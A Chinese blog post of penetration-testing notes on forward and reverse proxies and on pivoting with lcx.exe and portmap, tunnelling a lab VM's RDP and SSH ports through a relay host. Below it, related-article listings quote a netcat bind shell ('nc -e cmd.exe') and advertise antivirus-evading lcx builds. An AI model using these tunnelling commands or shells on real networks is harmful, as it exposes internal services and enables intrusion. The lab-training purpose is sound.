代理内网穿透-Lcx.exe-venom-proxychains

已于 2022-04-25 18:57:23 修改
阅读量7k 收藏 23
点赞数 1
分类专栏: 网络安全 笔记 文章标签: web安全 安全
于 2022-04-24 21:32:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42096378/article/details/124380934
版权

代理


未经授权禁止任何渗透测试

面试常问

1.正向代理和反向代理的区别
2.正向代理和反向代理 常见出现位置

正向代理 客户端明确知道 存在一个中间代理服务器 反向代理 该代理对外表现就是一个服务器

一.概述

利用代理工具将内网的流量代理到本地进行访问或者利用工具将其他网段的流量转发到本地进行纵向渗透

msf 中 portfwd
将目标主机上的端口转发到msf所在的服务器上

代理的本质是socks协议.

二.代理分类:

1.正向代理

正向代理是将我们的流量转发给一个跳板,然后该跳板将我们发送给他的包转发给目标
比如我们国内访问***,直接访问访问不到,我们可以通过一个正向代理服务器,请求发到代理服务器,代理服务器能够访问**,这样由代理去取到返回数据,再返回给我们,这样我们就能访问
在这里插入图片描述
正向代理用途

访问原来无法访问的资源,如****,公司内网
出差访问公司内网 vpnclient 分配公司内网的ip地址
对客户端访问授权,上网进行认证
代理可以记录用户访问记录(上网行为管理),对外隐藏用户信息

xxxx 上网行为管理

反向代理

反向代理以代理服务器来处理来自网络上的连接请求,然后将请求转发到内部网络上的服务器,并将从内部服务器得到的结果返回给来自网络上的客户端,此时,代理服务器表现为一个服务器

在这里插入图片描述

反向代理的作用:

边界防火墙 nat
保证内网的安全,一定程度上阻止web攻击.
在大型网站中,通常将反向代理作为公网访问地址,而真正的Web服务器存在于内网之中.
负载均衡,通过反向代理服务器来优化网站的负载

三.Lcx.exe内网端口转发

在这里插入图片描述
在这里插入图片描述

步骤

bihuo 虚拟机 <=======> kali linux <=======> 物理机

物理机访问bihuo 虚拟机的3389端口 直接访问无法访问到

bihuo虚拟机: 主动将自身的3389端口的流量转发到kali linux 主机上的特定端口(11111)

kali linux 虚拟机:11111端口监听来自于bihuo虚拟机3389的流量 将11111端口接收到的流量转发到kali linux 的22222端口

物理机: 访问kali linux 的22222端口 就可以获得bihuo虚拟机的3389端口的流量

在这里插入图片描述

下载lcx – linux 版本 portmap

linux系统作为转发

  1. kali linux 虚拟机: 在11111端口监听来自于bihuo虚拟机3389的流量 将11111端口接收到的流量转发到kali linux 的22222端口

公网主机上执行:lcx.exe –listen 接收数据的端口 映射流量的端口,意思是监听公网主机本机的 11111端口请求,并将来自 11111 端口的请求传送给 22222 端口。

命令:

./portmap -m 2 -p1 11111 -p2 22222

在这里插入图片描述

  1. bihuo虚拟机: 主动将自身的3389端口的流量转发到kali linux 主机上的特定端口(11111)

内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口,意思是把内网主机的某端口转发到具有公网ip主机的 对应 端口。

开启3389
在这里插入图片描述

在这里插入图片描述
命令

lcx.exe -slave 192.168.0.142 1111 127.0.0.1 3389

在这里插入图片描述
3. 此时物理机直接访问:kaliIP:22222,即可转发到内网IP的3389
在这里插入图片描述
在这里插入图片描述

window系统转发流量

 kali linux <=======> bihuo 虚拟机<=======> 物理机

物理机访问 kali linux 虚拟机的22端口 直接访问无法访问到

kali linux虚拟机: 主动将自身的22端口的流量转发到bihuo虚拟机的特定端口(11111)

bihuo虚拟机: 在11111端口监听来自于kali linux虚拟机22的流量 将11111端口接收到的流量转发到bihuo虚拟机 的22222端口

物理机: 访问bihuo虚拟机的22222端口 就可以获得kali linux 虚拟机的22端口的流量
  1. bihuo虚拟机: 在11111端口监听来自于kali linux虚拟机22的流量 将11111端口接收到的流量转发到bihuo虚拟机 的22222端口

命令:

lcx.exe -listen 11111 22222

在这里插入图片描述
在这里插入图片描述

  1. kali linux虚拟机: 主动将自身的22端口的流量转发到bihuo虚拟机的特定端口(11111)

命令:

service ssh start  # 开启22端口

在这里插入图片描述
命令:

./portmap\ lcx -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.0.3 -p2 11111

在这里插入图片描述

  1. 物理机: 访问bihuo虚拟机的22222端口 就可以获得kali linux 虚拟机的22端口的流量
    访问

命令:

ssh kali@192.168.0.13 -p 22222

最低0.47元/天 解锁文章
嗯光
关注
  • 1
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
lcx的使用-内网穿透
帅醉了的博客
04-24 4278
lcx有两个功能映射(slave)和转发(tran) 简单看个列子: 映射(slave) 第一步: 我在攻击机上执行此命令 lcx -listen 3333 2222 此命令表示我监听3333端口,并把3333端口映射到2222端口 第二步: 我在靶机上执行此命令: lcx -slave 172.168.172.133 3333 172.168.172.201 3389 此命令表示我使用sl...
8K-size-lcx.exe
09-03
8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe8K-size-lcx.exe
端口转发工具,可以规避主流杀软-lcx.exe
03-22
端口转发工具lcx.exe lcx.exe - [-log logfile] 可以规避主流杀软
【渗透工具】内网多级代理工具Venom详细使用教程
TT小子的博客
06-28 1383
Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。
内网代理穿透
huangyongkang666的博客
03-31 2929
内网代理穿透 实现内网穿透的工具有很多,如Earthworm,Termite,reGeorg,nps等,此处主要介绍Termite对模拟内网进行操作,Termite 是EW(EarthWorm)的最新版 1.nc工具使用 windows中使用nc,需要安装nc.exe 靶机 nc.exe -l -p 4444 -t -e cmd.exe 攻击机 nc.exe 192.168.1.1 4444 linux中使用nc,见工具使用栏中的netcat使用博客 2.termite使用 ​ 一款极度小巧灵活的跳板
Venom代理工具使用--以三层代理为例
y920312的专栏
03-30 1211
利用虚拟机模拟多层网络,以多层代理渗透为例,描述代理工具Venom的使用测试过程,帮助渗透测试人员使用Venom工具轻松地将网络流量代理到多层内网,并管理代理节点。
http代理穿透
weixin_34267123的博客
07-16 319
2019独角兽企业重金招聘Python工程师标准>>> ...
lcx 通过端口转发实现内网穿透
qq_29566629的博客
03-02 437
背景 实验 先使用iptables确保kali和漏洞主机不能互通: iptables -I INPUT -s 10.1.1.134 -j DROP 在漏洞主机上执行lcx -slave 10.1.1.143 1122 127.0.0.1 3389 把自己3389端口上的流量转发到10.1.1.143的端口上 在公网主机143上执行lcx -listen 1122 3300 把从1122端口接收到的流量转发到3300端口,这时所有访问这台公网主机3300端口的流量都会直接到达漏洞主机的3389端口:
LCX-make.zip
06-24
lcx是基于socket技术编写的传输层协议下的端口转发工具,其出现已有十多年的历史,但其速度和稳定性至今仍然很好用,一来通过源码编译在跨平台使用lcx,二来由于其源码修改进行了免杀处理,有很好的免杀效果。
lcx.exe32位和lcx64.exe位端口映射.rar
03-19
LCX是一款强大的内网穿透工具,它提供了32位和64位的版本,分别为`lcx.exe`和`lcx64.exe`,适用于不同的操作系统环境。此压缩包包含了这两个版本的执行文件以及相关说明,旨在帮助用户进行端口映射操作,从而在不同...
lcx-vuln.cn.zip
最新发布
08-04
lcx-vuln.cn.zip
HTTP代理穿透方法
02-22
HTTP代理穿透方法
lcx.exe软件 使用
12-28
lcx.exe 软件 使用下载 很强大的一个小工具
免杀的lcx.exe
01-19
免杀的lcx.exe,要的速度哦,免杀的lcx.exe,要的速度哦,免杀的lcx.exe,要的速度哦,
内网穿透--LCX+portmap转发实验
qq_65150735的博客
08-03 409
内网穿透--LCX+portmap转发实验
代理-穿透-转发
5L2g556F5ZWl77yf
08-24 567
文章目录frp手册代理类型SSH代理socks5代理NPSVenomshellsock5代理ngrockSSH 转发穿透正向转发 frp 手册 https://gofrp.org/docs/ 代理类型 类型 描述 tcp 单纯的 TCP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 udp 单纯的 UDP 端口映射,服务端会根据不同的端口路由到不同的内网服务。 http 针对 HTTP 应用定制了一些额外的功能,例如修改 Host Header,增加鉴权。 https
Http代理穿透技术
blade2001的专栏
09-26 1580
穿透代理服务器编程  http://blog.csdn.net/snail8384/article/details/3613373 透过代理看世界 用VC++实现http代理 http://school.cnd8.com/c/jiaocheng/8706.htm Http代理穿透技术: http://hi.baidu.com/aebiz_wxp/item/1
浅谈http代理服务器的穿透
linlin003的专栏
09-14 1762
思路就是先用套接字连接代理服务器,然后给代理服务器发送http请求,访问远程服务器 代码如下(只是连接): //初使化服务器地址      local.sin_family=AF_INET;      local.sin_port=htons(8080);
Venom工具的使用(内网渗透 多级代理
rang的博客
08-19 3232
在Moriarty Corp靶场下使用Venom工具穿透内网 工具说明:https://github.com/Dliv3/Venom 编译好的可执行文件:https://github.com/Dliv3/Venom/releases admin监听端口,agent发起连接: ./admin_linux_x64 -lport 9999 # 攻击机开启监听 ./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接 agent监
lcx.exe32位和lcx64.exe位端口映射工具
07-03
### 回答1: lcx.exelcx64.exe是一种端口映射工具。端口映射是一种网络技术,可以将一个端口上的网络数据转发到另一个端口上。通过使用lcx.exelcx64.exe,我们可以实现将本地的一个端口与远程主机的一个端口进行映射。 lcx.exe是32位的版本,而lcx64.exe是64位的版本。由于计算机的操作系统可能是32位或64位的不同版本,因此提供了这两个版本以适应不同的操作系统环境。 使用lcx.exelcx64.exe进行端口映射可以有很多用途。例如,当我们需要访问远程主机上的某个端口时,但由于某些原因无法直接访问,我们可以使用这些工具将本地的一个端口与远程主机的该端口进行映射,从而实现对远程主机上的端口的访问。 另外,lcx.exelcx64.exe还可以用于网络安全测试和渗透测试。通过端口映射,我们可以在本地主机上创建一个代理,将远程主机上的服务转发到本地主机上进行分析和测试。这可以帮助我们评估系统的安全性,并发现可能存在的漏洞。 总之,lcx.exelcx64.exe是一种非常方便的端口映射工具,可以实现本地端口与远程主机端口的映射,对于远程访问和网络安全测试都具有重要的作用。 ### 回答2: LCX(Loopback Connection)是一种端口映射工具,可以将本地端口与远程端口进行映射,实现连接的转发和反向连接。lcx.exe32位和lcx64.exe位是两个不同架构的LCX工具。 lcx.exe32位是适用于32位操作系统的LCX工具版本,可以在32位的Windows系统上使用。它能够通过端口映射实现本地服务的转发和穿透,让远程主机能够访问本地服务。它是基于32位架构的编译和运行的,适用于32位操作系统的特性和架构。 lcx64.exe位是适用于64位操作系统的LCX工具版本,可以在64位的Windows系统上使用。与lcx.exe32位相比,它是针对64位系统进行编译和优化的。相比于32位版本,lcx64.exe位可以更好地适应64位系统的特性和架构,提高性能和稳定性。 无论是lcx.exe32位还是lcx64.exe位,它们都提供了一种简单而强大的工具来进行端口映射,帮助用户轻松地实现本地服务的穿透和远程访问。用户可以根据自己的操作系统架构选择合适的版本来使用,以获得更好的体验和性能。 ### 回答3: lcx.exe32位和lcx64.exe位是一种端口映射工具,用于在计算机网络中建立传输通道,实现端口之间的数据交换。它能够实现多种映射方式,如本地端口映射、远程端口映射和监听映射。 lcx.exe32位和lcx64.exe位的工作原理是通过将本地端口与远程端口进行映射,使得程序在使用本地端口通信时,实际上是经过远程端口进行通信。这样的映射操作可以提供更高的安全性和灵活性,同时隐藏真实的网络架构和IP地址。 端口映射工具的应用场景非常广泛。比如,在企业网络中,可以使用端口映射工具来实现内部主机与外部网络的通信,从而确保内部网站和服务器能够被外部网络访问;在网络安全测试中,可以使用端口映射工具进行端口扫描和漏洞检测,以评估网络安全性;在软件开发中,可以使用端口映射工具来进行本地调试和远程调试,方便开发人员进行程序调试和测试等。 总之,lcx.exe32位和lcx64.exe位是一种功能强大的端口映射工具,可以帮助用户建立安全可靠的数据通信通道,提高网络的性能和灵活性,应用场景非常广泛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值